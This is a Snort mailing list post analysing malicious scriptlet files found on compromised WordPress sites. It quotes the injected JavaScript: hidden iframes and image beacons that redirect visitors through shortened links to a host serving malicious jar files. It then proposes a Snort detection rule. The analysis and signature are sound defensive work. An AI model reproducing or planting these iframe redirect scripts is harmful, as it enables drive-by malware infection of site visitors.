Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Malicious scriptlets

From: James Lay <jlay () slave-tothe-box net>
Date: Thu, 16 May 2013 11:16:32 -0600
So I've now seen two of these so far.  Compromised site gets a bonus 
file...a .sct scriptlet file.  These files had the initial header of the 
Sizzle CSS Engine:

badsite1.com/wp-includes/js/jquery/ie.sct
badsite2.biz/wp-content/themes/2012/css/themes.sct

/*
  * Sizzle CSS Selector Engine - v0.9.3
  *  Copyright 2009, The Dojo Foundation
  *  Released under the MIT, BSD, and GPL Licenses.
  *  More information: http://sizzlejs.com/
  */

but then goes on with the below (spaces added):

<s c r i p t l e t><implements 
type=behavior></implements><script>xchk='_';xurl='\x08//goo.gl/24vi1';(xifr=document.createElement('iframe')).style.display='none';document.body.appendChild(xifr);with(xifr){id='xfid';addBehavior('#default#userData');load(xchk);if(!getAttribute(xchk)){setAttribute(xchk,'_');save(xchk);expires=(new
 
Date((new 
Date()).getTime()+6e8)).toUTCString();src=xurl;}}</script></scriptlet>

the shortend goo.gl link points to bls.pw/ which apparently is 
"missing" an index.* page (hat tip to ET for detecting the .pw domain 
jazz).  The response is just as icky (snippets):

<t i t l e>404 Not Found</title>
<snip>
.<h1>Not Found</h1>
.<p>The requested URL / was not found on this server.</p>
.<p>Additionally, a 404 Not Found error was encountered while trying to 
use an ErrorDocument to handle the request.</p>
.<!--[if gt IE 7]>
.<s c r i p t type="text/javascript">
.setTimeout('new Image().src="//goo.gl/9yBTe"',2500);
<snip>
...innerHTML+='<iframe/src="&#08;https://&#13;goo.gl/1hpWA"style="position:absolute;left:-4200px;"onload="new 
Image().src=\'//goo.gl/hNVXP\'"></iframe>';
...innerHTML+='<iframe/src="&#08;https://&#13;goo.gl/EVVWF"style="position:absolute;left:-4200px;";></iframe>';

The shortened links are currently serving up nasty jar files:

https://www.virustotal.com/en/file/c4d37ef0e60e940527061444e1575a8e555dbe91ccb7e0fb5469a9c08f94de0f/analysis/1368718511/

Sig below should catch the response from the compromised server:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISED Scriptlet file with iframe redirect"; 
flow:from_server,established; file_data; content:"<scriptlet"; 
content:"url="; content:"iframe"; metadata:policy balanced-ips drop, 
policy security-ips drop, service http; metadata:ruleset community; 
classtype:trojan-activity; sid:10000060; rev:1)

Anything to help make the sig better would be much appreciated.

James

------------------------------------------------------------------------------
AlienVault Unified Security Management (USM) platform delivers complete
security visibility with the essential security capabilities. Easily and
efficiently configure, manage, and operate all of your security controls
from a single console and one unified framework. Download a free trial.
http://p.sf.net/sfu/alienvault_d2d
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: